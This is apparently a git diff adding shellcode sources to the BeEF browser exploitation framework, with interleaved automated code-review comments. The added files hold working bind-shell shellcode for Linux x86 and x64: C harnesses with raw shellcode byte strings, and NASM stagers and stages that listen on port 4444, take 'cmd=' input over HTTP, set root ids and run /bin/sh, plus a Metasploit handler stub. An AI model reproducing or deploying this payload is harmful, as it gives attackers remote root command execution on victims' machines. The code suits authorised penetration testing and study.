diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
new file mode 100755
index 000000000..58fee2877
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
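Review bot: The `beef_junk_port` and `beef_junk_socket` entries in `self.options` say nothing about what they have to agree with, yet the command script posts to `beef_host:beef_junk_port` and then polls `/api/ipec/junk/` with what appears to be the socket name, so a value that does not match the junk listener configured in BeEF only shows up as the script's "no data yet" retries. A comment above the array such as `# beef_junk_port / beef_junk_socket must match the junk listener configured in BeEF; the command script uses them to measure request-header size` would spare the next reader a trip through command.js. As a point of style, `beef_host = "#{configuration.get("beef.http.host")}"` is an interpolation-only string; `configuration.get("beef.http.host").to_s` reads more directly, assuming `get` returns a scalar.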
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include
+#include
+#include
+#include
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
+ char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+ if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+ memcpy(ptr, shellcode, sizeof(shellcode));
+ sc = (int(*)())ptr;
+ (void)((void(*)())ptr)();
+ printf("\n");
+ return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
new file mode 100755
index 000000000..2489775d3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
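Review bot: The global `sc` is assigned on the line after `memcpy` but never used, because the call on the next line goes through a separate `(void(*)())ptr` cast; either call through `sc` or drop the global, and the same applies to the x86 harness socket.c further down. The four `#include` directives show no header names in this rendering, presumably an extraction artifact of the angle brackets rather than the committed text, but it is worth confirming since the file cannot compile without them. `exit(-1)` is the non-portable spelling of `exit(EXIT_FAILURE)`. A one-line comment that the read/write/execute `mmap` is acceptable only in this throwaway test harness would document why the build line needs `-z execstack`.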
@@ -0,0 +1,285 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx,rdx ;zero rdx + + push BYTE 0x02 + pop r14 + + ;create two pipes +createpipes: + push rdx ;allocate space on the stack + mov rdi, rsp ;point to the stack + push BYTE 0x16 + pop rax ;sys_pipe + syscall + dec r14 + test r14, r14 ;create 2 pipes + je endcreatepipes + jmp createpipes + +endcreatepipes: + ;sys_fork + push BYTE 0x39 + pop rax + syscall + cmp eax, 0x00 ;parent or child? + je child + + xor rdi, rdi ; zero rdi + mov edi, DWORD [rsp+0x8] ; close read end of one pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;close write end of the other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;make non-blocking + mov edi, DWORD [rsp] ;fd + push BYTE 0x04 + pop rsi ;F_SETFL + xor rdx, rdx + mov rdx, 0x800 ;O_NONBLOCK + push BYTE 0x48 + pop rax ; sys_fcntl + syscall + + + ;allocate one page of memory + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + +doforever: + ;initialize socket + xor rdx, rdx ;zero rdx (proto =0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + pop rax ;clean stack + + + ;bind socket to port + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 
4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + pop rax ;clean stack + pop rax + + ;listen + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2b + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + ;close serversocket + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + + mov rcx, 0x1000 ;pagesize +firstzeromemory: + ;zero out memory + dec rcx + mov rbx, r14 + add rbx, rcx + mov BYTE [rbx], 0x00 + jrcxz readfromsocket + jmp firstzeromemory + +readfromsocket: + xor rdx, rdx + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x400 ;read 1024 bytes + push BYTE 0x00 + pop rax ;sys_read + syscall + + mov rcx, 0x400 ;search in 1024 bytes + mov rbx, r14 ;ptr to allocated memory +search: + cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd=" + je found ;cmd= found + inc rbx + dec rcx + jrcxz notfound ;cmd= not in recieved buffer + jmp search ;search some more +found: + xor rdi, rdi + mov rcx, rbx + add rcx, 0x03 ;skip "cmd" + mov rsi, rcx + mov edi, DWORD [rsp+0xC] ;write to pipe +sendcommand: + inc rsi ;first time skip "=", move to next byte + push BYTE 0x01 + pop rdx ;write one byte + push BYTE 0x01 + pop rax ;sys_write + syscall + cmp BYTE [rsi], 0x0a ;LF character? 
+ jne sendcommand ;else continue write to pipe + + ;sleep one second + push BYTE 0x23 + pop rax ;sys_nanosleep + push DWORD 0x00 + push DWORD 0x01 ;one second + mov rdi, rsp ;ptr to argument array + xor rsi, rsi ;NULL + syscall + + pop rax ;clean stack + pop rax + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a + +writehttpheaders: + pop rsi ;source address saved by call + mov rdi, r14 ;ptr to allocated memory + add rdi, 0x400 ;skip 1024 bytes + mov rcx, 0x62 ;copy 98 bytes + rep movsb + + xor rdi, rdi ;zero rdi + mov edi, DWORD [rsp] ;read from pipe + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 bytes + add rsi, 0x62 ;skip header + mov rdx, 0xb86 ;read max 2950 bytes + xor rax,rax ;sys_read + syscall + + + mov rdi, r15 ;clientsocket fd + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 first bytes + mov rdx, 0xbe8 ;send max 3048 bytes + push BYTE 0x01 + pop rax ;sys_write + syscall + + mov rdi, r15 ;close clientsocket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + jmp doforever +child: + xor rdi, rdi + mov edi, DWORD [rsp+0xc] ;close output side of pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi ;close stdin + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x08] ;dup input side to stdin + push BYTE 0x20 + pop rax ;sys_dup + syscall + + + mov edi, DWORD [rsp] ;close input side of other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi + inc rdi ;close stdout + push 
BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;dup output side to stdout + push BYTE 0x20 + pop rax ;sys_dup + syscall + + ;setresuid(0,0,0) + xor rdi, rdi + xor rsi, rsi + xor rdx, rdx + push BYTE 0x75 + pop rax ;sys_resuid + syscall + + push BYTE 0x3b + pop rax ;sys_execve + mov rdi, 0x0068732f6e69622f ;/bin/shNULL + push rdi ;push to stack + mov rdi, rsp ;ptr to stack + xor rsi, rsi ;NULL + xor rdx, rdx ;NULL + syscall diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm new file mode 100755 index 000000000..1a5d776bb --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm 
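Review bot: The comment on `push BYTE 0x75` reads `;sys_resuid`, but syscall 117 on x86-64 is `setresuid`, so it should read `;sys_setresuid` to match the `;setresuid(0,0,0)` heading above it. The same hunk carries comment typos — `sokaddr`, `filediscriptor`, `recieved` — that recur in stager64.nasm, stage.nasm and stager.nasm below and could be fixed in one pass. The `;sys_nanosleep` block would also benefit from a comment that the two `push DWORD` instructions build a 16-byte `timespec` on the stack (seconds then nanoseconds after the pops are read in order), since the `DWORD` size name is misleading for a 64-bit push.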
@@ -0,0 +1,106 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx, rdx ;zero rdx (proto=0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2B + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;allocate memory + + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x1000 ;read one page of memory + push BYTE 0x00 + pop rax ;sys_read + syscall + + ;close clientsocketfd + mov rdi, r15 ;client socketfd + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov rsi, r14 ;ptr to allocated memory +search: + cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd=" + je 
short found ;cmd= found
+ inc rsi
+ jmp short search ;search some more
+found:
+ push BYTE 0x04 ;skip "cmd="
+ pop rax
+ add rsi, rax
+ jmp rsi ;jump to stage
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
new file mode 100644
index 000000000..f4e198fa3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include
+#include
+#include
+#include
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+ char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+ if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+ memcpy(ptr, shellcode, sizeof(shellcode));
+ sc = (int(*)())ptr;
+ (void)((void(*)())ptr)();
+ printf("\n");
+ return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm new file mode 100644 index 000000000..3ec5d952b --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm 
@@ -0,0 +1,290 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor edx, edx ;zero edx + + push BYTE 0x02 + pop ecx + ;create two pipes +createpipes: + push edx ;allocate space on stack + push edx + mov ebx, esp ; ptr to argument array + push BYTE 0x2A ;sys_pipe + pop eax + int 0x80 ;syscall + dec ecx + jcxz endcreatepipes ;jmp when both pipes are created + jmp short createpipes ;create next pipe + +endcreatepipes: + ;create fork + xor ebx, ebx ;zero ebx + push BYTE 0x02 ;sys_fork + pop eax + int 0x80 ;syscall + cmp eax, 0x00 ;parent or child + je child + + mov ebx, [esp+0x8] ;close read end of one pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;close write end of the other pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + ; make non blocking + mov ebx, [esp] ;fd + push BYTE 0x04 ;F_SETFL + pop ecx + push 0x800 ;O_NONBLOCK + pop edx + push BYTE 0x37 ;sys_fcntl + pop eax + int 0x80 + + ;allocate one page of memory + push BYTE 0x00 ;offset = 0 + push 0xffffffff ;fd=-1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push 0x00 ;system determines location + mov ebx, esp ;ptr to argument array + push BYTE 0x5a + pop eax + int 0x80 + mov edi, eax ;ptr to allocated memory + add esp, 0x18 + +doforever: + xor edx, edx + xor eax, eax + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ;proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ; save socket filedescriptor + add esp, 0x0C + + ;reuse socket + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + 
push esp ;address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115c = 4444 + mov ecx, esp ;ptr to server struct + push BYTE 0x10 ; addrlen + push ecx + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + add esp, 0x08 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;sockfd + mov ecx, esp ;ptr to argumet array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x0c + + xchg esi, eax ;serversocket in eax and clientsocket handler in esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x06 ;close serversocket + int 0x80 + + mov ecx, 0x1000 +firstzeromemory: + ;zero out memory + dec ecx + mov ebx, edi + add ebx, ecx + mov BYTE [ebx], 0x00 + jecxz readfromsocket + jmp firstzeromemory + +readfromsocket: + ;read from socket into memory + mov dx, 0x400 ;read 1024 bytes + mov ecx, edi ;ptr to allocated memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax ;sys_read + int 0x80 + + push edi ;ptr to allocate memory + push esi ;clientsocket + mov ebx, edi ;ptr to allocated memory + mov ecx, 0x400 ;search in 1024 bytes +search: + cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd=" + je found ;cmd= found + inc ebx + dec ecx + jecxz notfound ;cmd= not in recieved buffer + jmp search ;search some more + +found: + mov ecx, ebx ;put ptr to memory where "cmd=" was found + add ecx, 0x03 ;skip "cmd" + mov ebx, [esp+0x14] ;write to pipe +sendcommand: + inc ecx ;first 
time skip "=", move to next byte + push BYTE 0x01 ;write one byte + pop edx + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + cmp BYTE [ecx], 0x0a ;LF character? + jne sendcommand ;else continue write to pipe + + ;sleep one second + push 0x00 + push 0x01 ;one second + mov ebx, esp ;ptr to argument array + xor ecx, ecx ;NULL + mov eax, 0xA2 ;sys_nanosleep + int 0x80 + add esp, 0x08 ;clean up stack + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a ;HTTP/1.1 200 OK + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a ;Content-Type: text/html + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a ;Access-Control-Allow-Origin: * + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a ;Content-Length: 3048 + +writehttpheaders: + pop esi ;source address saved by call + add edi, 0x400 ;ptr to memory skip 1024 bytes + mov ecx, 0x62 ;copy 98 bytes + rep movsb + + pop edi ;restore clientsocket + pop esi ;restore ptr to memory + + + mov ebx, [esp] ;read from pipe + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 bytes + add ecx, 0x62 ;skip header + push 0xB86 ;read max 2950 bytes + pop edx + push BYTE 0x03 ;sys_read + pop eax + int 0x80 + + mov ebx, edi ;clientsocket + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 first bytes + mov edx, 0xbe8 ;send max 3048 bytes + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + + ;close clientsocket + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov edi, esi ;restore memory ptr into edi + jmp doforever + +child: + mov ebx, [esp+0xC] ;close output side of pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + xor ebx, ebx ;close stdin + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + 
mov ebx, [esp+0x8] ;dup input side to stdin + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + mov ebx, [esp] ;close input side of other pipe + push BYTE 0x06 + pop eax + int 0x80 + + xor ebx, ebx + inc ebx ;close stdout + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;dup output side to stdout + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + ;setresuid(0,0,0) + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + mov al, 0xa4 ;sys_setresuid16 + int 0x80 + + ;execve("/bin//sh", 0, 0) + xor eax, eax + push eax + push eax + push 0x68732f2f ;//sh + push 0x6e69622f ;/bin + mov ebx, esp + push BYTE 0x0b ;sys_execve + pop eax + int 0x80 diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm new file mode 100644 index 000000000..903a7f0b4 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm 
@@ -0,0 +1,111 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor eax, eax ;zero eax + xor edx, edx ;zero edx + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ; proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ;save socket filediscriptor + + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + push esp ; address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115C = 4444 + mov ecx, esp ;server struct + push BYTE 0x10 ;addrlen + push ecx + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + xchg esi, eax ;serversocket in eax and client socket handler into esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x6 ;close serversocket + int 0x80 + + push BYTE 0x00 ;offset =0 + push 0xFFFFFFFF ;fd = -1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push BYTE 
0x00 ;system determines location + mov ebx, esp ;ptr tot argument array + push BYTE 0x5a + pop eax ;MMAP call + int 0x80 + mov edi, eax ;ptr to allocated memory + + ; read from socket into memory + mov dx, 0x1000 ;max bytes to read + mov ecx, edi ;pointer to memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax + int 0x80 + + push BYTE 0x06 + pop eax ;close clientsocket + int 0x80 + +search: + cmp DWORD [edi], 0x3d646d63 ;compare with "cmd=" + je short found ;jump if found + inc edi ;look some further + jmp short search +found: + push BYTE 0x04 + pop eax + add edi, eax ;skip "cmd=" + jmp edi ;jump to the staged shellcode diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb new file mode 100644 index 000000000..29be93ecd --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb 
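Review bot: Two comments in the socket setup carry typos that will trip anyone reading this file next to its msf wrapper — `mov esi, eax ;save socket filediscriptor` should read `;save socket file descriptor`, and `mov ebx, esp ;ptr tot argument array` should read `;ptr to argument array`. The header also says nothing about which immediate the msf stager module rewrites; a line such as `; LPORT: the 0x115C half of 'push 0x5c110002' is the value the msf beef_bind stager module patches at its LPORT offset` would keep this source and the module's Offsets entry in step when either is changed. That the module's offset 47 lands on this immediate is inferred from the byte string in beef_bind-stager-linux-x86.rb rather than stated anywhere in the commit.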
@@ -0,0 +1,73 @@
+##
+# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler placeholder only.
+#
+###
+module BeEFBind
+
+ include Msf::Handler
+
+ #
+ # Returns the handler specific string representation
+ #
+ def self.handler_type
+ return "beef_bind"
+ end
+
+ #
+ # Returns the connection oriented general handler type
+ #
+ def self.general_handler_type
+ "bind"
+ end
+
+ #
+ # Initializes a bind handler and adds the options common to all bind
+ # payloads, such as local port.
+ #
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ Opt::LPORT(4444),
+ #OptAddress.new('RHOST', [false, 'The target address', '']),
+ ], Msf::Handler::BeEFBind)
+ end
+
+ #
+ # Placeholder only
+ #
+ def cleanup_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def add_handler(opts={})
+ # Start a new handler
+ start_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def start_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def stop_handler
+ end
+
+end
+
+end
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
new file mode 100644
index 000000000..99079e92f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
